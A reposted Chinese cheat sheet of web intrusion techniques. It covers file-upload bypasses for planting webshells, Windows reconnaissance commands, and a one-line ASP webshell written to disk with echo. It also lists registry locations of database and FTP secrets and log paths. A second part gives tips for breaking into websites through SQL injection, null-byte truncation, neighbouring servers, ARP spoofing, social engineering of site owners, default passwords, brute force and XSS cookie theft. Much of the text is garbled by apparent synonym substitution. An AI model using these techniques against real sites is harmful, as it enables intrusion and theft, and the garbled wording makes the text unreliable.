WEB下渗透测试经验技术(全)[转载]

Nuclear’Atk 整理的:

上传漏洞拿shell:

1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.
2.便是当上传时在后缀后面加空格或者加几碰,也许也会生奇之意识。例:*.asp
,*.asp..。
3.采用更扩展名上传例如:*.jpg.asa格式(也可下放上第二沾同步使用)。
4.gif文书头欺骗
5.同名重复上传也异常OK。:

犯渗透着因故到之下令,语法:

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多之系统信息
tasklist /svc   查看 服务对应之pid
netstat -ano,netstat -abnv
fsutil.exe fsinfo drives  列有全方位盘符
dir d:\*conn*.* /s     找数据库连接文件
telnet 218.25.88.234 3389    对表是否开放了是端口
echo  ^<%execute(request(“cmd”))%^> >>e:\k\X.asp  
写一句子话到e:\k\目录,密码为cmd.
type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp  
传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

注册表敏感信息:

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\    mysql 注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\   华众主机位置
HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\    serv-u 位置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters   
1433端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual
Roots\  服务器ftp路径

服务器日志文件物理路径:

安全日志文件:%systemroot%\system32\config \SecEvent.EVT
系统日志文件:%systemroot%\system32\config \SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config \AppEvent.EVT
FTP连接日志与HTTPD事务日志:systemroot%
\system32\LogFiles\,下面还有子文件夹,分别指向该FTP和Web服务之日记,其相应的后缀名为.Log。
诺顿杀毒日志:C:\Documents and Settings\All Users\Application
Data\Symantec

oldjun 大牛写的侵网站的涉:

下面谈谈个人侵犯之阅历,不分语言,只说拿webshell,至于提权,这里不说,我哉死少提权,除非确实发必不可少!~

1.无论呀站,无论什么语言,我一旦渗透,第一宗事就是扫目录,最好一下扫起单达到传点,直接上传shell,诸位不要笑,有时候你花费大长远行一个站,最后发现出只现成的达传点,而且很易猜到,不过这种气象来在asp居多!

2.asp(aspx)+MSSQL先考虑注入,一般的注入都发生DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那即便怀疑数据,从后台下手了,后台可上传或者转移配置文件;

3.asp(aspx)+ACCESS拿shell一般就来3种艺术,一是前台上传或者注入进后台上污染;二凡流进后台改配置文件;三凡是流进后台备份数据库或者暴库后了解是asp或者asa数据库于是直接写一词话;

4.php+MYSQL一般是流进后台上传,偶尔运气好把权限够高可注入select into
outfile;然后包含,分本地及长途,远程包含在高版本php是不支持之,于是想方本地及污染图片文件要写到log里;然后php程序之一未明的
漏洞,运气好得一直写shell。

5.jsp+MYSQL运用数据库拿权者着力同php,而且jsp的上传基本好少检查文件后缀,于是要来注入点与后台,拿shell相当之易。jsp+ORACLE的立自身碰到的匪多,碰到的啊是猜出用户称以及密码从后台下手的。

6.无论什么大立,主站一般还分外安全(不然早给人玩了),于是一般由二级域名下手,猜出主站的少数用户称与密码或做到主站的源代码,或者旁注得到与网段服务器后cain或arp。

7.相似的坏立格外少来因此现成的CMS的,于是要您碰巧找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都控制在你手里。多省那些很立新出的测试分站点,那些站还在测试中,可以好自在拿下。

8.臻污染有个文本称截断,这包2个点,一凡是00截断,二凡是长文件称截断(曾经以是来下hw);然后众多状文件的地方,都可00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都得以啦)目录的妙用。

9.php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的上,在
server变量注入的下还是得以select into
outfile,今年自干过某不开源cms就是这情况,一般景象下为on就变更考虑写文件了,不过有之权力别忘了读文件源码,因为load_file的
参数是可编码的。

10.猜门道或者文件在侵犯被老必要,猜不顶路的时光别忘了google(baidu太烂,google很咸),于是你可设想看站点下之robot.txt或者robots.txt,会起悲喜。

11.器的应用好关键,入侵之前用WVS扫扫会有帮助入侵;注入工具则多,但无展现得还吓要,现在之软硬防火墙、防注入越来越厉害,那时候你尽管转变偷懒,多手工有帮你成长。

12.赶上了同样流监控么,遇到其他防post的防火墙么,有时候一句话进去了还心有余而力不足传大马,那时候,你先学学编码,学学变换绕了。

13.怀念将一般的小站,记得查看此小站的版权,找开这个站的企业,然后起者公司做的任何站下手,得到源码再回头打,我曾经通过者措施拿下某著名制药的铺站。

14.旁注之思绪永远只是时,遇到dbowner的注入,可以很畅快写shell到您待之站,省得辛苦的提权了;运气不好,按部就班拿shell提权得到你所急需。

15.永恒转变忘社会工程学,利用社工把自己真是一个呀也未见面的口,从某站长的qq,身份证,邮箱等等下手,也许有时可能会见生意外;另外别忘admin,admin;test,test;123456,123456这种简单的品味,当然,你呢得以暴力破解。

16.别忽视XSS,别忽视cookie,XSS可以偷cookie,更产生多妙用,自己学会领悟;cookie可以以假乱真登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。

17.平时整治站多搜集路径啊,源码啊,工具啊,充实自己之“武器”库;最好将自己之侵扰步骤记录下来,或者以后反思下,我一般都是记在txt里,另外要到位举一反三。

18.多攻,多看源码,多扣公布出来的0day,脚论是侵之前提,而无是工具,会用工具会装B你还不曾入门。

相关文章